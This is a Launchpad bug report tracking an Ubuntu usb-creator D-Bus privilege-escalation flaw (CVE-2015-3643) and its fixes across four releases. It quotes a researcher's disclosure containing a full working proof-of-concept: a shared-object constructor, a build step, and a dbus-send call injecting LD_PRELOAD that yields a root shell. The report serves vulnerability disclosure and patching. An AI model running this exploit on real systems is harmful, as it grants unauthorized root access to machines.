Tavis Ormandy discovered a local root vulnerability with the com.ubuntu.USBCreator dbus service

Bug #1447396 reported by Seth Arnold
274
This bug affects 4 people
Affects Status Importance Assigned to Milestone
usb-creator (Ubuntu)
Fix Released
Undecided
Marc Deslauriers
Precise
Fix Released
Undecided
Marc Deslauriers
Trusty
Fix Released
Undecided
Marc Deslauriers
Utopic
Fix Released
Undecided
Marc Deslauriers
Vivid
Fix Released
Undecided
Marc Deslauriers

Bug Description

Reported on oss-security: http://www.openwall.com/lists/oss-security/2015/04/22/12

Text from Tavis follows:

Hello,

[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]

On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.

It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.

This seems like an obvious mistake, and the following appears to work
on my machine:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Thanks, Tavis.

Changed in usb-creator (Ubuntu Precise):
status: New → Confirmed
Changed in usb-creator (Ubuntu Trusty):
status: New → Confirmed
Changed in usb-creator (Ubuntu Utopic):
status: New → Confirmed
Changed in usb-creator (Ubuntu Vivid):
status: New → Confirmed
Changed in usb-creator (Ubuntu Precise):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in usb-creator (Ubuntu Trusty):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in usb-creator (Ubuntu Utopic):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in usb-creator (Ubuntu Vivid):
assignee: nobody → Marc Deslauriers (mdeslaur)
Steve (st3v3)
information type: Public Security → Private Security
information type: Private Security → Public Security
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.38.3ubuntu0.1

---------------
usb-creator (0.2.38.3ubuntu0.1) precise-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:18:51 -0400

Changed in usb-creator (Ubuntu Precise):
status: Confirmed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.56.3ubuntu0.1

---------------
usb-creator (0.2.56.3ubuntu0.1) trusty-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:18:17 -0400

Changed in usb-creator (Ubuntu Trusty):
status: Confirmed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.62ubuntu0.3

---------------
usb-creator (0.2.62ubuntu0.3) utopic-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:16:13 -0400

Changed in usb-creator (Ubuntu Utopic):
status: Confirmed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.67ubuntu0.1

---------------
usb-creator (0.2.67ubuntu0.1) vivid-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:10:43 -0400

Changed in usb-creator (Ubuntu Vivid):
status: Confirmed → Fix Released
Revision history for this message
Seth Arnold (seth-arnold) wrote :

This has been assigned CVE-2015-3643 -- http://www.openwall.com/lists/oss-security/2015/05/04/3

To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.